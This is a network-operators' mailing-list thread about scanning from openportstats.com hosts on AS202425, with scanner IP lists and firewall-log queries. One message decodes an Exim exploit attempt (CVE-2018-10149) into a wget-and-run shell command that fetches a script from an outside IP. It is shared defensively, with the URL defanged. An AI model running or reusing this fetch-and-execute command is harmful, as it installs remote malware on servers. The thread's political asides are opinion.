Re: Russian Anal Probing + Malware
In message , "Keith Medcalf" wrote: >On Friday, 21 June, 2019 18:14, Ronald F. Guilmette com> wrote: > >>https://twitter.com/GreyNoiseIO/status/1129017971135995904 >>https://twitter.com/JayTHL/status/1128718224965685248 > >Sorry, don't twitter ... Too much malicious JavaScript there. Can you be more, um, specific? >>80.82.64.21 scanner29.openportstats.com >>... > >Why do you think it is a problem and not just run-of-the-mill background >radiation on the Internet? It's not a problem for me personally... other than the fact that these goofballs are filling up my log files to no good end. I just wanted others to be aware of this (apparently ongoing) garbage. And I wouldn't want anyone to be fooled by the mere fact that this openportstats.com domain has a sort-of a web site. It's still 100% illegitimate. >Do you (or your endpoints) not have a firewall to block such things? I do, and I hope everyone else does also. >What malware slinging? I see none of that. You didn't look at the Twitter reports. >>https://bit.ly/2ZBayc4 > >Malicious link detected. If you say so. (It's actually just a cute picture.) Regards, rfg
Re: Russian Anal Probing + Malware
Hello, On Sat, Jun 22, 2019 at 11:01:13AM -0600, Keith Medcalf wrote: > What malware slinging? Some user there is trying to exploit CVE-2018-10149: 2019-06-11 11:28:35 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:" H=(myhostname) [89.248.171.57] next input="QUIT\n" Plus another 17 attempts by that IP through to 19 June. $ printf "\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22\n" /bin/sh -c "wget --no-check-certificate -T 36 hxxps://185.162.235.211/ldm1ip -O /root/.yyearz && sh /root/.yyearz -n &" (I replaced https with hxxps to prevent auto-link-followers from hitting the site.) Cheers, Andy
Re: Russian Anal Probing + Malware
On 6/22/19 2:13 AM, Ronald F. Guilmette wrote: https://twitter.com/GreyNoiseIO/status/1129017971135995904 https://twitter.com/JayTHL/status/1128718224965685248 Friday Questionaire: Is there anybody on this list who keeps firewall logs and who DOESN'T have numerous hits recorded therein from one or more of the following IP addresses? 80.82.64.21 scanner29.openportstats.com 80.82.70.2 scanner8.openportstats.com 80.82.70.198 scanner21.openportstats.com 80.82.70.216 scanner13.openportstats.com 80.82.78.104 scanner151.openportstats.com 89.248.160.132 scanner15.openportstats.com 89.248.162.168 scanner5.openportstats.com 89.248.168.62 scanner1.openportstats.com 89.248.168.63 scanner2.openportstats.com 89.248.168.73 scanner3.openportstats.com 89.248.168.74 scanner4.openportstats.com 89.248.168.170 scanner17.openportstats.com 89.248.168.196 scanner16.openportstats.com 89.248.171.38 scanner7.openportstats.com 89.248.171.57 scanner20.openportstats.com 89.248.172.18 scanner25.openportstats.com 89.248.172.23 scanner27.openportstats.com 93.174.91.31 scanner10.openportstats.com 93.174.91.34 scanner11.openportstats.com 93.174.91.35 scanner12.openportstats.com 93.174.93.98 scanner18.openportstats.com 93.174.93.149 scanner6.openportstats.com 93.174.93.241 scanner14.openportstats.com 93.174.95.37 scanner19.openportstats.com 93.174.95.42 scanner8.openportstats.com 94.102.51.31 scanner31.openportstats.com 94.102.51.98 scanner55.openportstats.com 94.102.52.245 scanner9.openportstats.com NOTE: Dshield has already assigned an 8 rating on their Badness Richter Scale to the specific one of the above addresses that's been poking me personally in recent days: https://www.dshield.org/ipinfo.html?ip=89.248.162.168 https://www.dshield.org/ipdetails.html?ip=89.248.162.168 And the Dshield rating is *just* based on the probing. The addition of malware slinging also puts this whole mess over the top entirely. Oh! And I'll save you all the time looking it up 100% of the IPs listed above are on AS202425 "IP Volume, Inc. allegedly of the Seychelles Islands, where the employees and management are no doubt enjoying their luxurious and expansive new corporate headquarters... It's just a port/vulnerability scanner, I really don't see anything special about this particular case. "IP Volume" is actually a new brand of Ecatel/Quasi Networks, servers are in a Dutch datacenter. P.S. This is the kind of thing that everybody really should expect when the U.S. Department of Defense takes it upon itself to start up its own little private and unauthorized (cyber)war on Russia, wthout first obtaining the consent of Congress... you know, kinda like that ancient yellowed document that nobody in this country reads anymore says they should. And apparently, the DoD was understandably not anxious to brief even the President about all this... https://www.businessinsider.com/us-officials-hide-russia-cyber-operation-trump-2019-6 (Not that anybody can really blame them for THAT.) What does that have to do with the vulnerability scanner? Also: You know it doesn't make any sense, right? -- Filip Hruska Linux System Administrator
Re: Russian Anal Probing + Malware
AS202425 = AS29073. Formerly known as Quasi Networks / Ecatel. See previous NANOG thread here: https://mailman.nanog.org/pipermail/nanog/2017-August/091956.html On Sat, Jun 22, 2019 at 10:03 AM Keith Medcalf wrote: > On Friday, 21 June, 2019 18:14, Ronald F. Guilmette > wrote: > > >https://twitter.com/GreyNoiseIO/status/1129017971135995904 > >https://twitter.com/JayTHL/status/1128718224965685248 > > Sorry, don't twitter ... Too much malicious JavaScript there. > > >Friday Questionaire: > > >Is there anybody on this list who keeps firewall logs and who > >DOESN'T have numerous hits recorded therein from one or more > >of the following IP addresses? > > >80.82.64.21 scanner29.openportstats.com > >80.82.70.2 scanner8.openportstats.com > >80.82.70.198 scanner21.openportstats.com > >80.82.70.216 scanner13.openportstats.com > >80.82.78.104 scanner151.openportstats.com > >89.248.160.132 scanner15.openportstats.com > >89.248.162.168 scanner5.openportstats.com > >89.248.168.62 scanner1.openportstats.com > >89.248.168.63 scanner2.openportstats.com > >89.248.168.73 scanner3.openportstats.com > >89.248.168.74 scanner4.openportstats.com > >89.248.168.170 scanner17.openportstats.com > >89.248.168.196 scanner16.openportstats.com > >89.248.171.38 scanner7.openportstats.com > >89.248.171.57 scanner20.openportstats.com > >89.248.172.18 scanner25.openportstats.com > >89.248.172.23 scanner27.openportstats.com > >93.174.91.31 scanner10.openportstats.com > >93.174.91.34 scanner11.openportstats.com > >93.174.91.35 scanner12.openportstats.com > >93.174.93.98 scanner18.openportstats.com > >93.174.93.149 scanner6.openportstats.com > >93.174.93.241 scanner14.openportstats.com > >93.174.95.37 scanner19.openportstats.com > >93.174.95.42 scanner8.openportstats.com > >94.102.51.31 scanner31.openportstats.com > >94.102.51.98 scanner55.openportstats.com > >94.102.52.245 scanner9.openportstats.com > > I have just a few. They have all been blocked. There have been no > incoming sessions established, nor any outbound sessions to these addresses. > > Why do you think it is a problem and not just run-of-the-mill background > radiation on the Internet? > > Do you (or your endpoints) not have a firewall to block such things? > > sqlite> select * from hosts where name like '%openports%'; > id addressname description asn >lastupdate > -- - --- > -- -- > 366293.174.93.241 scanner14.openportstats.com. > 202425 1561209704 > 506193.174.95.42 scanner8.openportstats.com. > 202425 1560718494 > 11894 93.174.93.149 scanner6.openportstats.com. > 202425 1560732443 > 17720 93.174.93.98 scanner18.openportstats.com. > 202425 1560640554 > 54208 80.82.70.2 scanner8.openportstats.com. > 202425 1560774033 > 54790 89.248.160.13 scanner15.openportstats.com. > 202425 1560682732 > 55081 89.248.168.19 scanner16.openportstats.com. > 202425 1561158220 > 55629 89.248.168.17 scanner17.openportstats.com. > 202425 1560817976 > 59858 89.248.171.57 scanner20.openportstats.com. > 202425 1560800216 > 64626 89.248.171.38 scanner7.openportstats.com. > 202425 1560841829 > 70081 93.174.95.37 scanner19.openportstats.com. > 202425 1560802023 > 72978 80.82.70.216 scanner13.openportstats.com. > 202425 1560709312 > 74711 94.102.52.245 scanner9.openportstats.com. > 202425 1560589038 > 80358 89.248.162.16 scanner5.openportstats.com. > 202425 1561217966 > 86148 89.248.172.18 scanner25.openportstats.com. > 202425 1560884061 > 89484 94.102.51.31 scanner31.openportstats.com. > 202425 1561199715 > 90131 80.82.70.198 scanner21.openportstats.com. > 202425 1560776777 > 90531 80.82.78.104 scanner151.openportstats.com > 202425 1561150052 > 91641 80.82.64.21scanner29.openportstats.com. > 202425 1561184548 > 104810 94.102.51.98 scanner55.openportstats.com. > 202425 1561138118 > > sqlite> select * from asns where asn=202425; > asn country rir allocated description lastupdate > -- -- -- -- --- -- > 202425 SC ripencc 2018-05-17 INT-NETWORK, SC 1561217966 > > sqlite> select srcaddress, count(*), min(localtime), max(localtime) from > firewalllog where srcaddress in (select address from hosts where name like > '%openportstats.com.') group by srcaddress; > srcaddress count(*)min(localtime) max(localtime) > --- -- -- > -- > 80.82.64.21 6 2019-03-28 05:21:13.919 -06:00 2019-03-31 > 06:47:28.309 -06:00 > 80.82.70.2 208 2019-01-23 12:58:02.557 -07:00 2019-04-02 > 06:37:43.125 -06:00 >
RE: Russian Anal Probing + Malware
On Friday, 21 June, 2019 18:14, Ronald F. Guilmette wrote: >https://twitter.com/GreyNoiseIO/status/1129017971135995904 >https://twitter.com/JayTHL/status/1128718224965685248 Sorry, don't twitter ... Too much malicious JavaScript there. >Friday Questionaire: >Is there anybody on this list who keeps firewall logs and who >DOESN'T have numerous hits recorded therein from one or more >of the following IP addresses? >80.82.64.21 scanner29.openportstats.com >80.82.70.2 scanner8.openportstats.com >80.82.70.198 scanner21.openportstats.com >80.82.70.216 scanner13.openportstats.com >80.82.78.104 scanner151.openportstats.com >89.248.160.132 scanner15.openportstats.com >89.248.162.168 scanner5.openportstats.com >89.248.168.62 scanner1.openportstats.com >89.248.168.63 scanner2.openportstats.com >89.248.168.73 scanner3.openportstats.com >89.248.168.74 scanner4.openportstats.com >89.248.168.170 scanner17.openportstats.com >89.248.168.196 scanner16.openportstats.com >89.248.171.38 scanner7.openportstats.com >89.248.171.57 scanner20.openportstats.com >89.248.172.18 scanner25.openportstats.com >89.248.172.23 scanner27.openportstats.com >93.174.91.31 scanner10.openportstats.com >93.174.91.34 scanner11.openportstats.com >93.174.91.35 scanner12.openportstats.com >93.174.93.98 scanner18.openportstats.com >93.174.93.149 scanner6.openportstats.com >93.174.93.241 scanner14.openportstats.com >93.174.95.37 scanner19.openportstats.com >93.174.95.42 scanner8.openportstats.com >94.102.51.31 scanner31.openportstats.com >94.102.51.98 scanner55.openportstats.com >94.102.52.245 scanner9.openportstats.com I have just a few. They have all been blocked. There have been no incoming sessions established, nor any outbound sessions to these addresses. Why do you think it is a problem and not just run-of-the-mill background radiation on the Internet? Do you (or your endpoints) not have a firewall to block such things? sqlite> select * from hosts where name like '%openports%'; id addressname description asn lastupdate -- - --- -- -- 366293.174.93.241 scanner14.openportstats.com. 202425 1561209704 506193.174.95.42 scanner8.openportstats.com.202425 1560718494 11894 93.174.93.149 scanner6.openportstats.com.202425 1560732443 17720 93.174.93.98 scanner18.openportstats.com. 202425 1560640554 54208 80.82.70.2 scanner8.openportstats.com.202425 1560774033 54790 89.248.160.13 scanner15.openportstats.com. 202425 1560682732 55081 89.248.168.19 scanner16.openportstats.com. 202425 1561158220 55629 89.248.168.17 scanner17.openportstats.com. 202425 1560817976 59858 89.248.171.57 scanner20.openportstats.com. 202425 1560800216 64626 89.248.171.38 scanner7.openportstats.com.202425 1560841829 70081 93.174.95.37 scanner19.openportstats.com. 202425 1560802023 72978 80.82.70.216 scanner13.openportstats.com. 202425 1560709312 74711 94.102.52.245 scanner9.openportstats.com.202425 1560589038 80358 89.248.162.16 scanner5.openportstats.com.202425 1561217966 86148 89.248.172.18 scanner25.openportstats.com. 202425 1560884061 89484 94.102.51.31 scanner31.openportstats.com. 202425 1561199715 90131 80.82.70.198 scanner21.openportstats.com. 202425 1560776777 90531 80.82.78.104 scanner151.openportstats.com 202425 1561150052 91641 80.82.64.21scanner29.openportstats.com. 202425 1561184548 104810 94.102.51.98 scanner55.openportstats.com. 202425 1561138118 sqlite> select * from asns where asn=202425; asn country rir allocated description lastupdate -- -- -- -- --- -- 202425 SC ripencc 2018-05-17 INT-NETWORK, SC 1561217966 sqlite> select srcaddress, count(*), min(localtime), max(localtime) from firewalllog where srcaddress in (select address from hosts where name like '%openportstats.com.') group by srcaddress; srcaddress count(*)min(localtime) max(localtime) --- -- -- -- 80.82.64.21 6 2019-03-28 05:21:13.919 -06:00 2019-03-31 06:47:28.309 -06:00 80.82.70.2 208 2019-01-23 12:58:02.557 -07:00 2019-04-02 06:37:43.125 -06:00 80.82.70.19 114 2019-03-25 14:13:17.058 -06:00 2019-04-02 06:39:57.214 -06:00 80.82.70.21 17970 2019-02-25